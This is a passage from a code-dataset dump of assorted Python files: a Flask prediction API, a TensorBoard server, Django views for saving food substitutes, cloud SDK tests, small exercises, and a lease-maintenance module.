value, trace = sys.exc_info()\n LOG.info(\"%s raised in %s.setUpClass. 
Invoking tearDownClass.\" % (\n etype, cls.__name__))\n cls.tearDownClass()\n try:\n six.reraise(etype, value, trace)\n finally:\n del trace # to avoid circular refs\n\n @classmethod\n def tearDownClass(cls):\n at_exit_set.discard(cls)\n # It should never be overridden by descendants\n if hasattr(super(BaseTestCase, cls), 'tearDownClass'):\n super(BaseTestCase, cls).tearDownClass()\n # Save any existing exception, we always want to re-raise the original\n # exception only\n etype, value, trace = sys.exc_info()\n # If there was no exception during setup we shall re-raise the first\n # exception in teardown\n re_raise = (etype is None)\n while cls.teardowns:\n name, teardown = cls.teardowns.pop()\n # Catch any exception in tearDown so we can re-raise the original\n # exception at the end\n try:\n teardown()\n except Exception as te:\n sys_exec_info = sys.exc_info()\n tetype = sys_exec_info[0]\n # TODO(andreaf): Till we have the ability to cleanup only\n # resources that were successfully setup in resource_cleanup,\n # log AttributeError as info instead of exception.\n if tetype is AttributeError and name == 'resources':\n LOG.info(\"tearDownClass of %s failed: %s\" % (name, te))\n else:\n LOG.exception(\"teardown of %s failed: %s\" % (name, te))\n if not etype:\n etype, value, trace = sys_exec_info\n # If exceptions were raised during teardown, and not before, re-raise\n # the first one\n if re_raise and etype is not None:\n try:\n six.reraise(etype, value, trace)\n finally:\n del trace # to avoid circular refs\n \n \n @classmethod\n def setup_clients(cls):\n \"\"\"Create links to the clients into the test object.\"\"\"\n # TODO(andreaf) There is a fair amount of code that could me moved from\n # base / test classes in here. Ideally tests should be able to only\n # specify which client is `client` and nothing else.\n pass\n\n @classmethod\n def resource_setup(cls):\n \"\"\"Class level resource setup for test cases.\"\"\"\n pass\n\n \n","sub_path":"Apiautotesting/frontend/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508903253","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# To use a consistent encoding\nfrom os import path\nfrom codecs import open\n# Always prefer setuptools over distutils\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name = 'flask-procmc',\n packages = ['flask-procmc'],\n version = '0.0.1',\n description = 'A python wrapper around the pro.coinmarketcap.com API for flask.',\n author = 'Jordan Hansford',\n author_email = 'hansfordjordan@gmail.com',\n url = 'https://github.com/hansfordj/flask_procmc',\n project_urls={\n 'Bug Reports': 'https://github.com/hansfordj/flask_procmc/issues',\n 'Buy me a coffee': 'https://github.com/barnumbirr/coinmarketcap#buy-me-a-coffee',\n },\n license = 'Apache v2.0 License',\n install_requires=[\n 'requests>=2.18.4',\n 'requests_cache>=0.4.13'\n ],\n keywords = ['cryptocurrency', 'API', 'coinmarketcap','BTC', 'Bitcoin', 'LTC', 'Litecoin', 'XMR', 'Monero', 'ETH', 'Ethereum '],\n classifiers=[\n 'License :: OSI Approved :: Apache Software License',\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Programming Language :: 
Python',\n        'Programming Language :: Python :: 3.7',\n        'Topic :: Software Development :: Libraries :: Python Modules',\n    ],\n    long_description = long_description,\n    long_description_content_type='text/markdown',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"21064809","text":"\"\"\"\nDate : 2021/05/13\nName : 김승용\nTask : coding test - number card game\n\"\"\"\n\n# read n and m, separated by a space\nn, m = map(int, input('input: ').split())\n\nnums = []\nresult = 0\n\nfor i in range(n):\n    data = list(map(int, input('input: ').split()))\n\n    # find the smallest number in this row of data\n    data.sort()\n    num = data[0]\n    nums.append(num)\n\n# find the largest value among the row minimums in nums\nnums.sort()\nresult = nums[-1]\n\nprint(result)","sub_path":"CodingTest/Test02.py","file_name":"Test02.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"187394980","text":"import argparse\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom quickprediction.dbs.orderdb import OrderDB\nfrom quickprediction.prediction.predict import Predict\nfrom quickprediction.parsers.timeparser import TimeParser\nfrom quickprediction.config import Configuration\n\n\ndef monthRangeFrom(months=0):\n  return datetime.today() + relativedelta(months=months)\n\n\ndef args():\n  parser = argparse.ArgumentParser(\"Execute swarms and models.\")\n  parser.add_argument(\n    \"-s\", \"--swarmtype\",\n    help=\"The swarm type to perform.\",\n    dest=\"swarmtype\",\n    choices=set((\"orderamount\", \"producttype\"))\n  )\n  parser.add_argument(\n    \"-b\", \"--businessid\",\n    help=\"The id of the business.\",\n    dest=\"businessid\"\n  )\n  parser.add_argument(\n    \"-m\", \"--monthsprior\",\n    help=\"How far back data from the database should be fetched in months for swarming.\",\n    dest=\"monthsprior\",\n    type=int,\n    default=-3\n  )\n  parser.add_argument(\n    \"-d\", \"--dir\",\n    help=\"The base directory to write the files to. 
\\\n      If the directory does not exist, it will be created.\",\n    dest=\"dir\"\n  )\n  return parser\n\n\nif __name__ == \"__main__\":\n  args = args().parse_args()\n  swarmType = args.swarmtype.upper()\n  businessid = args.businessid\n  directory = args.dir\n\n  monthsprior = monthRangeFrom(args.monthsprior)\n\n  config = Configuration()\n  dbDetails = config.read([Configuration.DATABASES])[0][0]\n  # Connect to the database\n  database = OrderDB(\n    dbDetails[\"uri\"],\n    dbDetails[\"port\"],\n    dbDetails[\"database\"],\n    dbDetails[\"username\"],\n    dbDetails[\"password\"]\n  )\n  database.connect()\n  # Get orders from three months ago.\n  orders = database.read(fromDate=monthsprior)\n  # Parse out the number of orders for each hour of the last three months.\n  hourlyOrders = TimeParser.extractHourlyOrders(orders, monthsprior)\n  database.close()\n  # Get ready to write to .csv file\n  predict = Predict(businessid, swarmType, directory)\n  predict.begin(hourlyOrders)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"103524683","text":"\"\"\"\nif the temperature is greater than 30, it's a hot day; otherwise\nif it's less than 10, it's a cold day;\notherwise it's neither hot nor cold\n\n\"\"\"\ntemperature = int(input('temperature:'))\ncold_day = 10 > temperature\nhot_day = 30 < temperature\n\nif cold_day:\n    print(\"it's a cold day\")\nelif hot_day:\n    print(\"it's a hot day\")\nelse:\n    print(\"it's neither hot nor cold\")","sub_path":"condition.py/q_2.py","file_name":"q_2.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"507421577","text":"# -*- coding: utf-8 -*- #\n# Copyright 2017 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"E2e tests for 'category-manager assets' command group.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport contextlib\nfrom googlecloudsdk.api_lib.category_manager import utils\nfrom googlecloudsdk.core import resources\nfrom googlecloudsdk.core.util import retry\nfrom tests.lib import sdk_test_base\nfrom tests.lib.surface.category_manager import e2e_base as base\n\n\nclass AssetE2eTest(base.CategoryManagerE2eBase):\n \"\"\"E2e test for asset related commands.\"\"\"\n _BQ_TABLE_ASSET_FMT = 'projects/{project}/datasets/{dataset}/entries/{entry}'\n\n _BQ_DATASET = 'DO_NOT_DELETE_CATEGORY_MANAGER_TEST_DATASET'\n _BQ_TABLE = 'test_table1'\n\n def SetUp(self):\n self._asset = self._BQ_TABLE_ASSET_FMT.format(\n project=self.Project(), dataset=self._BQ_DATASET, entry=self._BQ_TABLE)\n\n @contextlib.contextmanager\n def TagAsset(self, asset, annotation):\n \"\"\"Tags an asset with an annotation.\"\"\"\n try:\n annotation_tag = self.Run(\n 'category-manager assets apply-annotation {} --annotation {} '.format(\n asset, annotation.name))\n yield annotation_tag\n finally:\n args = '{} --annotation {} --quiet'.format(asset, annotation.name)\n self.Run('category-manager assets delete-annotation ' + args)\n\n def testListAnnotationTagCommandOnBigQueryTableAsset(self):\n description = 'arbitrary-test-description'\n with self.CreateTaxonomyResource(description) as taxonomy, \\\n self.CreateAnnotationResource(taxonomy, description) as annotation, \\\n self.TagAsset(self._asset, annotation) as asset_tag:\n tag = self._ListAssetAnnotationTagsAndReturnMatch(self._asset,\n annotation.displayName)\n self.assertEqual(tag, asset_tag)\n\n def testApplyAnnotationCommandOnBigQueryTableAsset(self):\n description = 'arbitrary-test-description'\n with self.CreateTaxonomyResource(description) as taxonomy, \\\n self.CreateAnnotationResource(taxonomy, description) as annotation, \\\n self.TagAsset(self._asset, annotation) as asset_tag:\n escaped_asset = ('assets/projects%2Fcatman-e2e-test%2Fdatasets%2F'\n 'DO_NOT_DELETE_CATEGORY_MANAGER_TEST_DATASET%2Fentries'\n '%2Ftest_table1')\n expected_tag = utils.GetMessagesModule().AnnotationTag(\n annotation=annotation.name,\n annotationDisplayName=annotation.displayName,\n asset=escaped_asset,\n taxonomyDisplayName=taxonomy.displayName)\n self.assertEqual(asset_tag, expected_tag)\n\n def testDeleteAnnotationCommandOnBigQueryTableAsset(self):\n description = 'arbitrary-test-description'\n with self.CreateTaxonomyResource(description) as taxonomy, \\\n self.CreateAnnotationResource(taxonomy, description) as annotation, \\\n self.TagAsset(self._asset, annotation):\n tag = self._ListAssetAnnotationTagsAndReturnMatch(self._asset,\n annotation.displayName)\n self.assertIsNotNone(tag)\n\n args = '{} --annotation {} --quiet'.format(self._asset, annotation.name)\n self.Run('category-manager assets delete-annotation ' + args)\n\n tag = 
self._ListAssetAnnotationTagsAndReturnMatch(self._asset,\n annotation.displayName)\n self.assertIsNone(tag)\n\n def testSearchAssetsCommandOnBigQueryTableAsset(self):\n args = '\"project_id:{}\" --format=disable'.format(self.Project())\n assets = list(self.Run('category-manager assets search ' + args))\n table_asset = self._FindTableAsset(assets)\n self.assertIsNotNone(table_asset)\n\n def _FindTableAsset(self, assets):\n for asset in assets:\n if asset.subAsset is None and asset.name == self._asset:\n return asset\n\n def testAssetCommandGroupUserJourney(self):\n description = 'arbitrary-test-description'\n with self.CreateTaxonomyResource(description) as taxonomy:\n with self.CreateAnnotationResource(taxonomy, description) as annotation:\n taxonomy_resource = resources.REGISTRY.Parse(\n taxonomy.name, collection='categorymanager.projects.taxonomies')\n annotation_resource = resources.REGISTRY.Parse(\n annotation.name,\n collection='categorymanager.projects.taxonomies.annotations')\n\n # Search for BigQuery table asset.\n args = '\"project_id:{}\" --format=disable'.format(self.Project())\n assets = list(self.Run('category-manager assets search ' + args))\n table_asset = self._FindTableAsset(assets)\n self.assertIsNotNone(table_asset)\n\n # Tag asset with annotation.\n with self.TagAsset(table_asset.name, annotation) as asset_tag:\n listed_asset_tag = self._ListAssetAnnotationTagsAndReturnMatch(\n self._asset, annotation.displayName)\n self.assertEqual(asset_tag, listed_asset_tag)\n\n # Search for tagged asset based on annotation. We may have to retry\n # searching for the tagged asset a few times until Datahub's search\n # index updates which may take a few seconds.\n args = '--taxonomy {} --annotations {} --format=disable'.format(\n taxonomy_resource.taxonomiesId, annotation_resource.annotationsId)\n assets = retry.Retryer().RetryOnResult(\n lambda: list(self.Run('category-manager assets search ' + args)),\n should_retry_if=lambda result, _: not result,\n sleep_ms=[1000, 3000, 5000])\n self.assertEqual(len(assets), 1)\n tagged_table_asset = assets[0]\n self.assertEqual(table_asset, tagged_table_asset)\n\n\nif __name__ == '__main__':\n sdk_test_base.main()\n","sub_path":"google-cloud-sdk/lib/tests/e2e/surface/category_manager/assets/assets_e2e_test.py","file_name":"assets_e2e_test.py","file_ext":"py","file_size_in_byte":6361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438938672","text":"num_line=0\nnum_word=0\nwith open ('text_in.txt') as file:\n text = file.readlines()\n for line in text:\n words = line.split()\n for word in words:\n if word.find('аровоз')>-1:\n word = word.replace('воз', 'ход')\n words[num_word]=word\n line = ' '.join(words)\n text[num_line]=line\n num_word+=1\n num_line+=1\n num_word=0\n \n\nwith open ('text_out.txt', 'w') as file:\n file.write('\\n'.join(text))","sub_path":"Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"241954608","text":"from progress import Progress\n\nif __name__ == \"__main__\":\n loop = 1000000\n counter = 0\n\n print(loop)\n progress = Progress(loop)\n progress.progressBar(\"Calculation\")\n for i in range(loop):\n counter += i\n progress.tick(1)\n\n input()\n","sub_path":"progress/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"406677940","text":"import pandas as pd\r\n\r\ndict_v = {'one': pd.Series([1, 2, 3], index=['a', 'b', 'c']),\r\n 'two': pd.Series([1, 2, 3, 4], index=['a', 'b', 'c', 'd'])}\r\ndf = pd.DataFrame(dict_v)\r\n\r\ndf['three'] = pd.Series([10, 20, 30], index=['a', 'b', 'c'])\r\nprint(\"根据传递的系列添加新列:\\n{}\".format(df))\r\n\r\ndf['four'] = df['one'] + df['three']\r\nprint(\"使用存在的数据帧添加新列:\\n{}\".format(df))\r\n","sub_path":"chapter4/add_df_1.py","file_name":"add_df_1.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133688880","text":"\n\n#calss header\nclass _FOUNTAIN():\n\tdef __init__(self,): \n\t\tself.name = \"FOUNTAIN\"\n\t\tself.definitions = [u'a stream of water that is forced up into the air through a small hole, especially for decorative effect, or the structure in a lake or pool from which this flows']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_fountain.py","file_name":"_fountain.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"189051562","text":"import datetime\nfrom flask import Flask, jsonify, abort, make_response, request\nfrom flask_restful import Api, Resource, reqparse, fields, marshal, marshal_with\nfrom flask_cors import CORS, cross_origin\nfrom flask import url_for\nfrom sklearn.externals import joblib\n\nAPP = Flask(__name__, static_url_path=\"\")\nCORS(APP)\nAPI = Api(APP)\nMODEL = None\n\n\nPrediction = {\n 'row': fields.String,\n 'p_class': fields.String\n}\n\nclass Prediction(Resource):\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('row', type=str, location='json')\n self.reqparse.add_argument('p_class', type=str, location='json')\n\n def post(self):\n json_data = request.get_json(force=True)\n return json_data\n\n\nAPI.add_resource(Prediction, '/predict')\n\nif __name__ == '__main__':\n MODEL = joblib.load('../../models/solution_ueb02/model.pkl')\n APP.run(host='0.0.0.0', port=5444 ,debug=True)\n\n","sub_path":"notebooks/henrik_ueb02/online.py","file_name":"online.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"528540246","text":"# Copyright 2015 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Serve TensorFlow summary data to a web frontend.\n\nThis is a simple web server to proxy data from the event_loader to the web, and\nserve static web files.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging as base_logging\nimport os\nimport socket\nimport sys\nfrom werkzeug import serving\n\nfrom tensorflow.python.platform import app\nfrom tensorflow.python.platform import flags\nfrom tensorflow.python.platform import tf_logging as logging\nfrom tensorflow.python.summary import event_file_inspector as efi\nfrom tensorflow.tensorboard.backend import application\n\n\n# TensorBoard flags\n\nflags.DEFINE_string('logdir', '', \"\"\"logdir specifies the directory where\nTensorBoard will look to find TensorFlow event files that it can display.\nTensorBoard will recursively walk the directory structure rooted at logdir,\nlooking for .*tfevents.* files.\n\nYou may also pass a comma separated list of log directories, and TensorBoard\nwill watch each directory. You can also assign names to individual log\ndirectories by putting a colon between the name and the path, as in\n\ntensorboard --logdir=name1:/path/to/logs/1,name2:/path/to/logs/2\n\"\"\")\n\nflags.DEFINE_string('host', '0.0.0.0', 'What host to listen to. Defaults to '\n 'serving on 0.0.0.0, set to 127.0.0.1 (localhost) to'\n 'disable remote access (also quiets security warnings).')\n\nflags.DEFINE_integer('port', 6006, 'What port to serve TensorBoard on.')\n\nflags.DEFINE_boolean('purge_orphaned_data', True, 'Whether to purge data that '\n 'may have been orphaned due to TensorBoard restarts. '\n 'Disabling purge_orphaned_data can be used to debug data '\n 'disappearance.')\n\nflags.DEFINE_integer('reload_interval', 5, 'How often the backend should load '\n 'more data.')\n\n# Inspect Mode flags\n\nflags.DEFINE_boolean('inspect', False, \"\"\"Use this flag to print out a digest\nof your event files to the command line, when no data is shown on TensorBoard or\nthe data shown looks weird.\n\nExample usages:\ntensorboard --inspect --event_file=myevents.out\ntensorboard --inspect --event_file=myevents.out --tag=loss\ntensorboard --inspect --logdir=mylogdir\ntensorboard --inspect --logdir=mylogdir --tag=loss\n\nSee tensorflow/python/summary/event_file_inspector.py for more info and\ndetailed usage.\n\"\"\")\nflags.DEFINE_string(\n 'tag', '',\n 'The particular tag to query for. Only used if --inspect is present')\nflags.DEFINE_string(\n 'event_file', '',\n 'The particular event file to query for. Only used if --inspect is present '\n 'and --logdir is not specified.')\n\nFLAGS = flags.FLAGS\n\n\ndef create_tb_app():\n \"\"\"Read the flags, and create a TensorBoard WSGI application.\"\"\"\n if not FLAGS.logdir:\n raise ValueError('A logdir must be specified. 
Run `tensorboard --help` for '\n 'details and examples.')\n\n logdir = os.path.expanduser(FLAGS.logdir)\n return application.standard_tensorboard_wsgi(\n logdir=logdir,\n purge_orphaned_data=FLAGS.purge_orphaned_data,\n reload_interval=FLAGS.reload_interval)\n\n\ndef run_simple_server(tb_app):\n \"\"\"Start serving TensorBoard, and print some messages to console.\"\"\"\n # Mute the werkzeug logging.\n base_logging.getLogger('werkzeug').setLevel(base_logging.WARNING)\n\n try:\n server = serving.make_server(FLAGS.host, FLAGS.port, tb_app, threaded=True)\n server.daemon_threads = True\n except socket.error:\n if FLAGS.port == 0:\n msg = 'TensorBoard unable to find any open port'\n else:\n msg = (\n 'TensorBoard attempted to bind to port %d, but it was already in use'\n % FLAGS.port)\n logging.error(msg)\n print(msg)\n exit(-1)\n\n port = server.socket.getsockname()[1]\n msg = 'Starting TensorBoard %s at http://%s:%d' % (tb_app.tag, FLAGS.host,\n port)\n print(msg)\n logging.info(msg)\n print('(Press CTRL+C to quit)')\n sys.stdout.flush()\n\n server.serve_forever()\n\n\ndef main(unused_argv=None):\n if FLAGS.inspect:\n logging.info('Not bringing up TensorBoard, but inspecting event files.')\n event_file = os.path.expanduser(FLAGS.event_file)\n efi.inspect(FLAGS.logdir, event_file, FLAGS.tag)\n return 0\n else:\n tb = create_tb_app()\n run_simple_server(tb)\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"tensorflow-master/tensorflow/tensorboard/tensorboard.py","file_name":"tensorboard.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"373326383","text":"import logging\n\n\nclass TaskAction(object):\n \"\"\"The ABC of all actions\"\"\"\n\n def __init__(self, config, server = None, resturl = None):\n self.logger = logging.getLogger(type(self).__name__)\n self.config = config\n self.jobtypeMapper = { \"Analysis\" : \"Processing\",\n \"PrivateMC\" : \"Production\",\n \"Generic\" : \"Generic\",}\n self.server = server\n self.resturl = resturl\n if server: #when testing this can be none\n self.backendurls = self.server.get(self.resturl.replace('workflowdb', 'info'), data={'subresource':'backendurls'})[0]['result'][0]\n\n def execute(self):\n raise NotImplementedError\n\n","sub_path":"src/python/TaskWorker/Actions/TaskAction.py","file_name":"TaskAction.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440241145","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom pyartcd.locks import LockManager, LOCK_POLICY, Lock\n\n\nclass TestLocks(TestCase):\n def test_lock_policy(self):\n lock: Lock = Lock.GITHUB_ACTIVITY\n lock_policy: dict = LOCK_POLICY[lock]\n self.assertEqual(lock_policy['retry_count'], 36000)\n self.assertEqual(lock_policy['retry_delay_min'], 0.1)\n self.assertEqual(lock_policy['lock_timeout'], 60 * 60 * 6)\n\n def test_lock_name(self):\n lock: Lock = Lock.GITHUB_ACTIVITY\n lock_name = lock.value.format(version='4.14')\n self.assertEqual(lock_name, 'github-activity-lock-4.14')\n\n @patch(\"pyartcd.redis.redis_url\", return_value='fake_url')\n @patch(\"aioredlock.algorithm.Aioredlock.__attrs_post_init__\")\n def test_lock_manager(self, *_):\n lock: Lock = Lock.COMPOSE\n lm = LockManager.from_lock(lock)\n self.assertEqual(lm.retry_count, LOCK_POLICY[Lock.COMPOSE]['retry_count'])\n self.assertEqual(lm.retry_delay_min, LOCK_POLICY[Lock.COMPOSE]['retry_delay_min'])\n 
self.assertEqual(lm.internal_lock_timeout, LOCK_POLICY[Lock.COMPOSE]['lock_timeout'])\n self.assertEqual(lm.redis_connections, ['fake_url'])\n","sub_path":"pyartcd/tests/test_locks.py","file_name":"test_locks.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"406886463","text":"import regex as re\nimport ast\nfrom django.shortcuts import render\nfrom save.models import Product_subs\nfrom research.forms import SearchForm\nfrom django.contrib.auth.models import User\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.contrib.auth.decorators import login_required\n\n\n# variables initialization.\n\nform = SearchForm()\nsave = []\n\n# save substitut of product views\n@login_required(login_url='/index/')\ndef save_prod(request):\n # take a user id\n current_user = request.user\n if request.method == \"POST\":\n\n query = request.POST['subs_0']\n query = query.split(\"+\")\n # insert product in database\n Product_subs.objects.update_or_create(name_product=query[1],\n name_product_subs=query[0],\n image_product_subs=query[3],\n prod_sub_nut=query[4],\n nut_100=query[5],\n cuurent_user=current_user.id,\n url_subs=query[6],\n nut_levels=query[7],\n image_product=query[2])\n # take product save by user\n save = list(Product_subs.objects.filter(cuurent_user=current_user.id).values())\n # Slice pages\n paginator = Paginator(save, 2)\n # Get current page number\n page = request.GET.get('page')\n try:\n # Return only this page albums and not others\n save = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n save = paginator.page(1)\n except EmptyPage:\n save = paginator.page(paginator.num_pages)\n\n context_1 = {'form':form,'save': save}\n \n \n return render(request,'save/ind_pge_favorite.html',\n context_1)\n \n \nq_lip_fr = ''\nq_lip_1 = ''\nq_sat_fr = ''\nq_sat_1 = ''\nq_sugar_fr = ''\nq_sugar_1 = ''\nq_sodium_fr = ''\nq_sodium_1 = ''\ncontext = {}\n\n# views for aliment feature\n@login_required(login_url='/index/')\ndef aliment(request):\n\n if request.method == \"POST\":\n query_1 = request.POST['subs_1']\n query_1 = query_1.split('+')\n\n a = ast.literal_eval(query_1[1])\n a_1 = ast.literal_eval(query_1[4])\n query_lip = a['fat_100g']\n \n q_lip_fr = a_1['fat']\n if q_lip_fr == 'low':\n q_lip_1 = 'en faible quantité'\n elif q_lip_fr == 'moderate':\n q_lip_1 = 'en quantité moyenne'\n elif q_lip_fr == 'high':\n q_lip_1 = 'en quantité élevée'\n \n query_sat = a['saturated-fat_100g']\n q_sat_fr = a_1['saturated-fat']\n if q_sat_fr == 'low':\n q_sat_1 = 'en faible quantité'\n elif q_sat_fr == 'moderate':\n q_sat_1 = 'en quantité moyenne'\n elif q_sat_fr == 'high':\n q_sat_1 = 'en quantité élevée'\n \n query_sugar = a['sugars_100g']\n q_sugar_fr = a_1['sugars']\n if q_sugar_fr == 'low':\n q_sugar_1 = 'en faible quantité'\n elif q_sugar_fr == 'moderate':\n q_sugar_1 = 'en quantité moyenne'\n elif q_sugar_fr == 'high':\n q_sugar_1 = 'en quantité élevée'\n \n query_sodium = a['salt']\n q_sodium_fr = a_1['salt']\n if q_sodium_fr == 'low':\n q_sodium_1 = 'en faible quantité'\n elif q_sodium_fr == 'moderate':\n q_sodium_1 = 'en quantité moyenne'\n elif q_sodium_fr == 'high':\n q_sodium_1 = 'en quantité élevée'\n context = {\"nut\": query_1[0], \"sub_url\": query_1[2],\n \"lip_0\": query_lip, \"lip\": q_lip_fr,\n \"lip_1\": q_lip_1, \"sat_0\": query_sat,\n \"sat\": q_sat_fr, \"sat_1\": q_sat_1,\n \"sugar_0\": query_sugar, 
\"sugar\": q_sugar_fr,\n \"sugar_1\": q_sugar_1, \"sodium_0\": query_sodium,\n \"sodium\": q_sodium_fr, \"sodium_1\":q_sodium_1,\n \"product\": query_1[3], \"image\":query_1[5], \"form\":form}\n return render(request,'save/ind_pge_aliment.html',\n context)\n\n\n\n \n\n","sub_path":"save/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"321544454","text":"# Copyright 2019 PrivateStorage.io, LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nThis module implements a service which periodically spends ZKAPs to\nrefresh leases on all shares reachable from a root.\n\"\"\"\n\nfrom functools import (\n partial,\n)\nfrom datetime import (\n datetime,\n timedelta,\n)\nfrom errno import (\n ENOENT,\n)\nimport attr\n\nfrom zope.interface import (\n implementer,\n)\n\nfrom aniso8601 import (\n parse_datetime,\n)\n\nfrom twisted.internet.defer import (\n inlineCallbacks,\n maybeDeferred,\n)\nfrom twisted.application.service import (\n Service,\n)\nfrom twisted.python.log import (\n err,\n)\n\nfrom allmydata.interfaces import (\n IDirectoryNode,\n IFilesystemNode,\n)\nfrom allmydata.util.hashutil import (\n file_renewal_secret_hash,\n bucket_renewal_secret_hash,\n)\n\nfrom .controller import (\n bracket,\n)\n\nfrom .model import (\n ILeaseMaintenanceObserver,\n)\n\nSERVICE_NAME = u\"lease maintenance service\"\n\n\n@inlineCallbacks\ndef visit_storage_indexes(root_nodes, visit):\n \"\"\"\n Call a visitor with the storage index of ``root_node`` and that of all\n nodes reachable from it.\n\n :param IFilesystemNode root_node: The node from which to start.\n\n :param visit: A one-argument callable. It will be called with the storage\n index of all visited nodes.\n\n :return Deferred: A Deferred which fires after all nodes have been\n visited.\n \"\"\"\n if not isinstance(root_nodes, list):\n raise TypeError(\"root_nodes must be a list, not {!r}\".format(\n root_nodes,\n ))\n for node in root_nodes:\n if not IFilesystemNode.providedBy(node):\n raise TypeError(\"Root nodes must provide IFilesystemNode, {!r} does not\".format(\n node,\n ))\n\n stack = root_nodes[:]\n while stack:\n elem = stack.pop()\n visit(elem.get_storage_index())\n if IDirectoryNode.providedBy(elem):\n children = yield elem.list()\n # Produce consistent results by forcing some consistent ordering\n # here. This will sort by name.\n stable_children = sorted(children.items())\n for (name, (child_node, child_metadata)) in stable_children:\n stack.append(child_node)\n\n\ndef iter_storage_indexes(visit_assets):\n \"\"\"\n Get an iterator over storage indexes of all nodes visited by\n ``visit_assets``.\n\n :param visit_assets: A one-argument function which takes a visit function\n and calls it with all nodes to visit.\n\n :return Deferred[list[bytes]]: A Deferred that fires with a list of\n storage indexes from the visited nodes. 
